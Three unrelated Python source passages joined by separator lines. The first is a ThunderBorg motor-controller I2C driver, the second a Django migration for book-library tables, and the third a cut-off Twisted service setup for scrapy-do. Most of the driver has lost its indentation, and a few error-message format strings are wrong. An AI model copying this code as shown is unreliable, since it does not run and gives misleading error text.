:raises ThunderBorgException: An error happened on a stream.
"""
found = []
if not tb: tb = ThunderBorg(logger_name=logger_name,
log_level=logging.INFO,
static_init=True)
tb._log.info("Scanning I2C bus number %d.", bus_num)
for address in range(0x03, 0x77, 1):
if cls._is_thunder_borg_board(bus_num, address, tb):
found.append(address)
if close: tb.close_streams()
if len(found) == 0: # pragma: no cover
msg = ("No ThunderBorg boards found, is the bus number '%d' "
"correct? (should be 0 for Rev 1 and 1 for Rev 2)")
tb._log.error(msg, bus_num)
return found
@classmethod
def set_i2c_address(cls, new_addr, cur_addr=-1, bus_num=DEFAULT_BUS_NUM,
logger_name=''):
"""
Scans the I²C bus for the first ThunderBorg and sets it to a
new I²C address. If cur_addr is supplied it will change the
address of the board at that address rather than scanning the bus.
        The bus_num if supplied determines which I²C bus to scan using
        0 for Rev 1 or 1 for Rev 2 boards. If bus_num is not supplied it
        defaults to 1.
Warning, this new I²C address will still be used after
resetting the power on the device.
:param new_addr: New address to set a ThunderBorg board to.
:type new_addr: int
:param cur_addr: The current address of a ThunderBorg board. The
default of `-1` will scan the entire range.
:type cur_addr: int
        :param bus_num: The bus number where the address range will be
                        found. Default is set to 1.
        :type bus_num: int
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream or
failed to set the new address.
"""
tb = ThunderBorg(log_level=logging.INFO, logger_name=logger_name,
static_init=True)
if not (0x03 <= new_addr <= 0x77):
msg = ("Error, I2C addresses must be in the range "
"of 0x03 to 0x77")
tb._log.error(msg)
raise ThunderBorgException(msg)
if cur_addr < 0x00:
found = cls.find_board(bus_num=bus_num, tb=tb)
if len(found) < 1: # pragma: no cover
msg = ("No ThunderBorg boards found, cannot set a new "
"I2C address!")
tb._log.info(msg)
raise ThunderBorgException(msg)
cur_addr = found[0]
msg = "Changing I2C address from 0x%02X to 0x%02X on bus number %d."
tb._log.info(msg, cur_addr, new_addr, bus_num)
if cls._init_bus(bus_num, cur_addr, tb):
try:
recv = tb._read(cls.COMMAND_GET_ID, cls._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
tb.close_streams()
tb._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
tb.close_streams()
msg = "Missing ThunderBorg at address 0x%02X."
tb._log.error(msg, cur_addr)
raise ThunderBorgException(msg)
else:
if cls._check_board_chip(recv, bus_num, cur_addr, tb):
tb._write(cls.COMMAND_SET_I2C_ADD, [new_addr])
time.sleep(0.1)
msg = ("Address changed to 0x%02X, attempting to talk "
"with the new address.")
tb._log.info(msg, new_addr)
if cls._init_bus(bus_num, new_addr, tb):
try:
recv = tb._read(cls.COMMAND_GET_ID,
cls._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
tb.close_streams()
tb._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
tb.close_streams()
msg = ("Missing ThunderBorg at address 0x{:02X}."
).format(new_addr)
tb._log.error(msg)
raise ThunderBorgException(msg)
else:
if cls._check_board_chip(recv, bus_num,
new_addr, tb):
msg = ("New I2C address of 0x{:02X} set "
"successfully.").format(new_addr)
tb._log.info(msg)
else: # pragma: no cover
msg = ("Failed to set address to 0x{:02X}"
).format(new_addr)
tb._log.error(msg)
raise ThunderBorgException(msg)
tb.close_streams()
#
# Instance Methods
#
def close_streams(self):
"""
Close both streams if the ThunderBorg was not found and when we
are shutting down. We don't want memory leaks.
"""
if hasattr(self, '_i2c_read'):
self._i2c_read.close()
self._log.debug("I2C read stream is now closed.")
if hasattr(self, '_i2c_write'):
self._i2c_write.close()
self._log.debug("I2C write stream is now closed.")
def _write(self, command, data):
"""
Write data to the `ThunderBorg`.
:param command: Command to send to the `ThunderBorg`.
:type command: int
:param data: The data to be sent to the I²C bus.
:type data: list
:raises ThunderBorgException: If the 'data' argument is the wrong
type.
"""
assert isinstance(data, list), (
"Programming error, the 'data' argument must be of type list.")
assert hasattr(self, '_i2c_write'), (
"Programming error, the write stream has not been initialized")
assert hasattr(self._i2c_write, 'write'), (
"Programming error, the write stream object is not a stream.")
data.insert(0, command)
if six.PY2: # pragma: no cover
# Either PY2 or PY3 can be tested at a given time.
data = ''.join([chr(byte) for byte in data])
else:
data = bytes(data)
try:
self._i2c_write.write(data)
except ValueError as e: # pragma: no cover
msg = "{}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
def _read(self, command, length, retry_count=3):
"""
Reads data from the `ThunderBorg`.
:param command: Command to send to the `ThunderBorg`.
:type command: int
:param length: The number of bytes to read from the `ThunderBorg`.
:type length: int
:param retry_count: Number of times to retry the read. Default is 3.
:type retry_count: int
:rtype: A list of bytes returned from the `ThunderBorg`.
:raises ThunderBorgException: If reading a command failed.
"""
assert hasattr(self, '_i2c_read'), (
"Programming error, the read stream has not been initialized")
assert hasattr(self._i2c_read, 'read'), (
"Programming error, the read stream object is not a stream.")
for i in range(retry_count):
self._write(command, [])
recv = self._i2c_read.read(length)
# Split string/bytes
# b'\x99\x15\x00\x00\x00\x00' [153, 21, 0, 0, 0, 0]
if six.PY2: # pragma: no cover
# Either PY2 or PY3 can be tested at a given time.
data = [ord(bt) for bt in recv]
else:
data = [bt for bt in recv]
if command == data[0]:
break
if len(data) <= 0: # pragma: no cover
msg = "I2C read for command '{}' failed.".format(command)
self._log.error(msg)
raise ThunderBorgException(msg)
return data
def _set_motor(self, level, fwd, rev):
        if level < 0:
            # Reverse
            command = rev
            pwm = -int(self._PWM_MAX * level)
            # pwm is positive here, so clamp it at the maximum PWM value
            pwm = self._PWM_MAX if pwm > self._PWM_MAX else pwm
        else:
            # Forward / stopped
            command = fwd
            pwm = int(self._PWM_MAX * level)
            pwm = self._PWM_MAX if pwm > self._PWM_MAX else pwm
try:
self._write(command, [pwm])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
            motor = 1 if fwd == self.COMMAND_SET_A_FWD else 2
            msg = "Failed sending motor %d drive level, %s"
            self._log.error(msg, motor, e)
            raise ThunderBorgException(msg % (motor, e))
def set_motor_one(self, level):
"""
Set the drive level for motor one.
:param level: Valid levels are from -1.0 to +1.0.
A level of 0.0 is full stop.
A level of 0.75 is 75% forward.
A level of -0.25 is 25% reverse.
A level of 1.0 is 100% forward.
:type level: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_motor(level, self.COMMAND_SET_A_FWD, self.COMMAND_SET_A_REV)
def set_motor_two(self, level):
"""
Set the drive level for motor two.
:param level: Valid levels are from -1.0 to +1.0.
A level of 0.0 is full stop.
A level of 0.75 is 75% forward.
A level of -0.25 is 25% reverse.
A level of 1.0 is 100% forward.
:type level: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_motor(level, self.COMMAND_SET_B_FWD, self.COMMAND_SET_B_REV)
def set_both_motors(self, level):
"""
        Set the drive level for both motors.
:param level: Valid levels are from -1.0 to +1.0.
A level of 0.0 is full stop.
A level of 0.75 is 75% forward.
A level of -0.25 is 25% reverse.
A level of 1.0 is 100% forward.
:type level: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_motor(level, self.COMMAND_SET_ALL_FWD,
self.COMMAND_SET_ALL_REV)
def _get_motor(self, command):
"""
        Base motor speed retrieval method.
:param command:
"""
motor = 1 if command == self.COMMAND_GET_A else 2
try:
recv = self._read(command, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed reading motor %d drive level, {}".format(motor, e)
self._log.error(msg)
raise ThunderBorgException(msg)
level = float(recv[2]) / self._PWM_MAX
direction = recv[1]
if direction == self.COMMAND_VALUE_REV:
level = -level
elif direction != self.COMMAND_VALUE_FWD: # pragma: no cover
msg = ("Invalid command '{:02d}' while getting drive level "
"for motor {:d}.").format(direction, motor)
self._log.error(msg)
raise ThunderBorgException(msg)
return level
def get_motor_one(self):
"""
Get the drive level of motor one.
:rtype: The motor drive level.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_motor(self.COMMAND_GET_A)
def get_motor_two(self):
"""
Get the drive level of motor two.
:rtype: The motor drive level.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_motor(self.COMMAND_GET_B)
def halt_motors(self):
"""
Halt both motors. Should be used when ending a program or
when needing to come to an abrupt halt. Executing
``set_both_motors(0)`` essentially does the same thing.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
try:
self._write(self.COMMAND_ALL_OFF, [0])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed sending motors halt command, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
else:
self._log.debug("Both motors were halted successfully.")
def _set_led(self, command, r, g, b):
level_r = max(0, min(self._PWM_MAX, int(r * self._PWM_MAX)))
level_g = max(0, min(self._PWM_MAX, int(g * self._PWM_MAX)))
level_b = max(0, min(self._PWM_MAX, int(b * self._PWM_MAX)))
try:
self._write(command, [level_r, level_g, level_b])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed sending color to the ThunderBorg LED one."
self._log.error(msg)
raise ThunderBorgException(msg)
def set_led_one(self, r, g, b):
"""
Set the color of the ThunderBorg LED number one.
.. note::
1. (0, 0, 0) LED off
2. (1, 1, 1) LED full white
3. (1.0, 0.5, 0.0) LED bright orange
4. (0.2, 0.0, 0.2) LED dull violet
:param r: Range is between 0.0 and 1.0.
:type r: float
:param g: Range is between 0.0 and 1.0.
:type g: float
:param b: Range is between 0.0 and 1.0.
:type b: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_led(self.COMMAND_SET_LED1, r, g, b)
def set_led_two(self, r, g, b):
"""
Set the color of the ThunderBorg LED number two.
.. note::
1. (0, 0, 0) LED off
2. (1, 1, 1) LED full white
3. (1.0, 0.5, 0.0) LED bright orange
4. (0.2, 0.0, 0.2) LED dull violet
:param r: Range is between 0.0 and 1.0.
:type r: float
:param g: Range is between 0.0 and 1.0.
:type g: float
:param b: Range is between 0.0 and 1.0.
:type b: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_led(self.COMMAND_SET_LED2, r, g, b)
def set_both_leds(self, r, g, b):
"""
Set the color of both of the ThunderBorg LEDs
.. note::
1. (0, 0, 0) LED off
2. (1, 1, 1) LED full white
3. (1.0, 0.5, 0.0) LED bright orange
4. (0.2, 0.0, 0.2) LED dull violet
:param r: Range is between 0.0 and 1.0.
:type r: float
:param g: Range is between 0.0 and 1.0.
:type g: float
:param b: Range is between 0.0 and 1.0.
:type b: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
self._set_led(self.COMMAND_SET_LEDS, r, g, b)
def _get_led(self, command):
try:
recv = self._read(command, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
led = 1 if command == self.COMMAND_GET_LED1 else 2
msg = "Failed to read ThunderBorg LED {} color, {}".format(led, e)
self._log.error(msg)
raise ThunderBorgException(msg)
else:
r = recv[1] / float(self._PWM_MAX)
g = recv[2] / float(self._PWM_MAX)
b = recv[3] / float(self._PWM_MAX)
return r, g, b
def get_led_one(self):
"""
Get the current RGB color of the ThunderBorg LED number one.
.. note::
1. (0, 0, 0) LED off
2. (1, 1, 1) LED full white
3. (1.0, 0.5, 0.0) LED bright orange
4. (0.2, 0.0, 0.2) LED dull violet
:rtype: Return a tuple of the RGB color for LED number one.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_led(self.COMMAND_GET_LED1)
def get_led_two(self):
"""
Get the current RGB color of the ThunderBorg LED number two.
.. note::
1. (0, 0, 0) LED off
2. (1, 1, 1) LED full white
3. (1.0, 0.5, 0.0) LED bright orange
4. (0.2, 0.0, 0.2) LED dull violet
:rtype: Return a tuple of the RGB color for LED number two.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_led(self.COMMAND_GET_LED2)
def set_led_battery_state(self, state):
"""
Change from the default LEDs state (set with `set_led_one` and/or
`set_led_two`) to the battery monitoring state.
.. note::
If in the battery monitoring state the configured state is
disabled. The battery monitoring state sweeps the full range
between red (7V) and green (35V).
:param state: If `True` (enabled) LEDs will show the current
battery level, else if `False` (disabled) the LEDs
will be controlled with the `set_led_*` and the
`set_both_leds` methods.
:type state: bool
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
level = self.COMMAND_VALUE_ON if state else self.COMMAND_VALUE_OFF
try:
self._write(self.COMMAND_SET_LED_BATT_MON, [level])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed to send LEDs state change, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
def get_led_battery_state(self):
"""
Get the state of the LEDs between the default and the battery
monitoring state.
:rtype: Return `False` for the default state and `True` for
the battery monitoring state.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
try:
recv = self._read(self.COMMAND_GET_LED_BATT_MON,
self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed reading LED state, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
return False if recv[1] == self.COMMAND_VALUE_OFF else True
def set_comms_failsafe(self, state):
"""
Set the state of the motor failsafe. The default failsafe state
of ``False`` will cause the motors to continuously run without a
keepalive signal. If set to ``True`` the motors will shutdown
after 1/4 of a second unless it is sent the speed command every
1/4 of a second.
:param state: If set to ``True`` failsafe is enabled, else if set
to ``False`` failsafe is disabled. Default is
                      disabled when powered on.
:type state: bool
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
level = self.COMMAND_VALUE_ON if state else self.COMMAND_VALUE_OFF
try:
self._write(self.COMMAND_SET_FAILSAFE, [level])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed sending communications failsafe state, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
def get_comms_failsafe(self):
"""
Get the failsafe state.
:rtype: Return the failsafe state.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
try:
recv = self._read(self.COMMAND_GET_FAILSAFE, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed reading communications failsafe state, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
return False if recv[1] == self.COMMAND_VALUE_OFF else True
def _get_drive_fault(self, command):
try:
recv = self._read(command, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
motor = 1 if command == self.COMMAND_GET_DRIVE_A_FAULT else 2
msg = ("Failed reading the drive fault state for "
"motor {}, {}").format(motor, e)
self._log.error(msg)
raise ThunderBorgException(msg)
return False if recv[1] == self.COMMAND_VALUE_OFF else True
def get_drive_fault_one(self):
"""
Read the motor drive fault state for motor one.
.. note::
1. Faults may indicate power problems, such as under-voltage
(not enough power), and may be cleared by setting a lower
drive power.
2. If a fault is persistent (repeatably occurs when trying to
control the board) it may indicate a wiring issue such as
indicated below.
a. The supply is not powerful enough for the motors. The
board has a bare minimum requirement of 6V to operate
correctly. The recommended minimum supply of 7.2V should
be sufficient for smaller motors.
b. The + and - connections for the motor are connected to
each other.
c. Either + or - is connected to ground (GND, also known as
0V or earth).
d. Either + or - is connected to the power supply (V+,
directly to the battery or power pack).
e. One of the motors may be damaged.
3. Faults will self-clear, they do not need to be reset, however
some faults require both motors to be moving at less than
100% to clear.
4. The easiest way to run a check is to put both motors at a low
power setting that is high enough for them to rotate easily.
e.g. 30%
5. Note that the fault state may be true at power up, this is
normal and should clear when both motors have been driven.
:rtype: Return a `False` if there are no problems else a `True` if
a fault has been detected.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_drive_fault(self.COMMAND_GET_DRIVE_A_FAULT)
def get_drive_fault_two(self):
"""
Read the motor drive fault state for motor two.
.. note::
1. Faults may indicate power problems, such as under-voltage
(not enough power), and may be cleared by setting a lower
drive power.
2. If a fault is persistent (repeatably occurs when trying to
control the board) it may indicate a wiring issue such as
indicated below.
a. The supply is not powerful enough for the motors. The
board has a bare minimum requirement of 6V to operate
correctly. The recommended minimum supply of 7.2V should
be sufficient for smaller motors.
b. The + and - connections for the motor are connected to
each other.
c. Either + or - is connected to ground (GND, also known as
0V or earth).
d. Either + or - is connected to the power supply (V+,
directly to the battery or power pack).
e. One of the motors may be damaged.
3. Faults will self-clear, they do not need to be reset, however
some faults require both motors to be moving at less than
100% to clear.
4. The easiest way to run a check is to put both motors at a low
power setting that is high enough for them to rotate easily.
e.g. 30%
5. Note that the fault state may be true at power up, this is
normal and should clear when both motors have been driven.
:rtype: Return a `False` if there are no problems else a `True` if
a fault has been detected.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_drive_fault(self.COMMAND_GET_DRIVE_B_FAULT)
def get_battery_voltage(self):
"""
Read the current battery level from the main input.
:rtype: Return a voltage value based on the 3.3 V rail as a
reference.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
try:
recv = self._read(self.COMMAND_GET_BATT_VOLT, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed reading battery level, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
raw = (recv[1] << 8) + recv[2]
level = float(raw) / self.COMMAND_ANALOG_MAX
level *= self._VOLTAGE_PIN_MAX
return level + self._VOLTAGE_PIN_CORRECTION
def set_battery_monitoring_limits(self, minimum, maximum):
"""
Set the battery monitoring limits used for setting the LED color.
.. note::
1. The colors shown, range from full red at minimum or below,
yellow half way, and full green at maximum or higher.
2. These values are stored in EEPROM and reloaded when the board
is powered.
:param minimum: Value between 0.0 and 36.3 Volts.
:type minimum: float
:param maximum: Value between 0.0 and 36.3 Volts.
:type maximum: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
level_min = float(minimum) / self._VOLTAGE_PIN_MAX
level_max = float(maximum) / self._VOLTAGE_PIN_MAX
level_min = max(0, min(0xFF, int(level_min * 0xFF)))
level_max = max(0, min(0xFF, int(level_max * 0xFF)))
try:
self._write(self.COMMAND_SET_BATT_LIMITS, [level_min, level_max])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed sending battery monitoring limits, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
else:
time.sleep(0.2) # Wait for EEPROM write to complete
def get_battery_monitoring_limits(self):
"""
Read the current battery monitoring limits used for setting the
LED color.
.. note::
The colors shown, range from full red at minimum or below,
yellow half way, and full green at maximum or higher.
:rtype: Return a tuple of `(minimum, maximum)`. The values are
between 0.0 and 36.3 V.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
try:
recv = self._read(self.COMMAND_GET_BATT_LIMITS, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed reading battery monitoring limits, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
level_min = float(recv[1]) / 0xFF
level_max = float(recv[2]) / 0xFF
level_min *= self._VOLTAGE_PIN_MAX
level_max *= self._VOLTAGE_PIN_MAX
return level_min, level_max
def write_external_led_word(self, b0, b1, b2, b3):
"""
Write low level serial LED 32 bit word to set multiple LED devices
like SK9822 and APA102C.
.. note::
Bytes are written MSB (Most Significant Byte) first, starting at
b0. e.g. Executing ``tb.write_external_led_word(255, 64, 1, 0)``
would send 11111111 01000000 00000001 00000000 to the LEDs.
:param b0: Byte zero
:type b0: int
:param b1: Byte one
:type b1: int
:param b2: Byte two
:type b2: int
:param b3: Byte three
:type b3: int
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
b0 = max(0, min(self._PWM_MAX, int(b0)))
b1 = max(0, min(self._PWM_MAX, int(b1)))
b2 = max(0, min(self._PWM_MAX, int(b2)))
b3 = max(0, min(self._PWM_MAX, int(b3)))
try:
self._write(self.COMMAND_WRITE_EXTERNAL_LED, [b0, b1, b2, b3])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = ("Failed sending binary word for the external LEDs, {}"
).format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
def set_external_led_colors(self, colors):
"""
Takes a set of RGB values to set multiple LED devices like
SK9822 and APA102C.
.. note::
1. Each call will set all of the LEDs.
2. Executing ``tb.set_external_led_colors([[1.0, 1.0, 0.0]])``
will set a single LED to full yellow.
            3. Executing ``tb.set_external_led_colors([[1.0, 0.0, 0.0],
               [0.5, 0.0, 0.0], [0.0, 0.0, 0.0]])`` will set LED 1 to full
               red, LED 2 to half red, and LED 3 to off.
:param colors: The RGB colors for setting the LEDs.
:type colors: list
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
# Send the start marker
self.write_external_led_word(0, 0, 0, 0)
# Send each color in turn
for r, g, b in colors:
self.write_external_led_word(255, 255 * b, 255 * g, 255 * r)
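# Hedged usage sketch (added, not part of the library): drive both motors
# briefly, then halt. Assumes a board is attached at the default bus/address;
# ThunderBorg() raises ThunderBorgException when no board is found.
if __name__ == '__main__':
    try:
        tb = ThunderBorg()
        tb.set_comms_failsafe(False)   # motors run without keepalive commands
        tb.set_led_one(0.0, 1.0, 0.0)  # LED one to full green
        tb.set_both_motors(0.5)        # 50% forward
        time.sleep(1)
        tb.halt_motors()
    except ThunderBorgException as e:
        print(e)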
|
python
|
# Generated by Django 3.2.3 on 2021-05-24 21:11
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('sort', models.TextField(blank=True, null=True)),
('link', models.TextField()),
],
options={
'db_table': 'authors',
'managed': False,
},
),
migrations.CreateModel(
name='Book',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.TextField()),
('sort', models.TextField(blank=True, null=True)),
('timestamp', models.DateTimeField(blank=True, null=True)),
('pubdate', models.DateTimeField(blank=True, null=True)),
('series_index', models.FloatField()),
('author_sort', models.TextField(blank=True, null=True)),
('isbn', models.TextField(blank=True, null=True)),
('lccn', models.TextField(blank=True, null=True)),
('path', models.TextField()),
('flags', models.IntegerField()),
('uuid', models.TextField(blank=True, null=True)),
('has_cover', models.BooleanField(blank=True, null=True)),
('last_modified', models.DateTimeField()),
],
options={
'db_table': 'books',
'managed': False,
},
),
migrations.CreateModel(
name='BookAuthorLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'books_authors_link',
'managed': False,
},
),
migrations.CreateModel(
name='BookLanguageLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_order', models.IntegerField()),
],
options={
'db_table': 'books_languages_link',
'managed': False,
},
),
migrations.CreateModel(
name='BookPublisherLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'books_publishers_link',
'managed': False,
},
),
migrations.CreateModel(
name='BookRatingLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'books_ratings_link',
'managed': False,
},
),
migrations.CreateModel(
name='BookSeriesLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'books_series_link',
'managed': False,
},
),
migrations.CreateModel(
name='BookTagLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'books_tags_link',
'managed': False,
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
],
options={
'db_table': 'comments',
'managed': False,
},
),
migrations.CreateModel(
name='Data',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('book', models.IntegerField()),
('format', models.TextField()),
('uncompressed_size', models.IntegerField()),
('name', models.TextField()),
],
options={
'db_table': 'data',
'managed': False,
},
),
migrations.CreateModel(
name='Identifier',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.TextField()),
('val', models.TextField()),
],
options={
'db_table': 'identifiers',
'managed': False,
},
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('lang_code', models.TextField()),
],
options={
'db_table': 'languages',
'managed': False,
},
),
migrations.CreateModel(
name='Publisher',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('sort', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'publishers',
'managed': False,
},
),
migrations.CreateModel(
name='Rating',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rating', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'ratings',
'managed': False,
},
),
migrations.CreateModel(
name='Series',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('sort', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'series',
'managed': False,
},
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
],
options={
'db_table': 'tags',
'managed': False,
},
),
]
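# Note (added): because each model sets 'managed': False, Django tracks these
# models in migration state only and emits no CREATE TABLE statements; the
# tables are expected to exist already in an external database.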
|
python
|
#-------------------------------------------------------------------------------
# Author: Lukasz Janyst <[email protected]>
# Date: 26.11.2017
#
# Licensed under the 3-Clause BSD License, see the LICENSE file for details.
#-------------------------------------------------------------------------------
import logging
import os
from twisted.application.internet import TCPServer, SSLServer
from twisted.application.service import MultiService, IServiceMaker
from twisted.python import log, usage
from zope.interface import implementer
from twisted.web import server
from .webservice import get_web_app
from .controller import Controller
from .config import Config
from .utils import exc_repr, SSLCertOptions, decode_addresses
#-------------------------------------------------------------------------------
class ScrapyDoOptions(usage.Options):
optParameters = [
['config', 'c', '~/scrapy-do/config', 'A configuration file to load'],
]
#-------------------------------------------------------------------------------
@implementer(IServiceMaker)
class ScrapyDoServiceMaker:
tapname = "scrapy-do"
description = "A service running scrapy spiders."
options = ScrapyDoOptions
#---------------------------------------------------------------------------
def _validate_web_config(self, config):
interfaces = config.get_string('web', 'interfaces')
interfaces = decode_addresses(interfaces)
https = config.get_bool('web', 'https')
auth = config.get_bool('web', 'auth')
key_file = None
cert_file = None
chain_file = None
auth_file = None
files_to_check = []
if not interfaces:
raise ValueError('No valid web interfaces were configured')
if https:
key_file = config.get_string('web', 'key')
cert_file = config.get_string('web', 'cert')
chain_file = config.get_string('web', 'chain')
files_to_check += [key_file, cert_file]
if chain_file != '':
files_to_check.append(chain_file)
if auth:
auth_file = config.get_string('web', 'auth-db')
files_to_check.append(auth_file)
for path in files_to_check:
if not os.path.exists(path):
raise FileNotFoundError(
"No such file or directory: '{}'".format(path))
return interfaces, https, key_file, cert_file, chain_file, auth, \
auth_file
#---------------------------------------------------------------------------
def _configure_web_server(self, config, controller):
interfaces, https, key_file, cert_file, chain_file, _, _ = \
self._validate_web_config(config)
site = server.Site(get_web_app(config, controller))
web_servers = []
for interface, port in interfaces:
if https:
cf = SSLCertOptions(key_file, cert_file, chain_file)
web_server = SSLServer(port, site, cf, interface=interface)
method = 'https'
else:
web_server = TCPServer(port, site, interface=interface)
method = 'http'
web_servers.append(web_server)
if ':' in interface:
interface = '[{}]'.format(interface)
log.msg(format="Scrapy-Do web interface is available at "
"%(method)s://%(interface)s:%(port)s/",
method=method, interface=interface, port=port)
return web_servers
#---------------------------------------------------------------------------
def makeService(self, options):
top_service = MultiService()
config_file = os.path.expanduser(options['config'])
config = Config([config_file])
#-----------------------------------------------------------------------
# Set up the controller
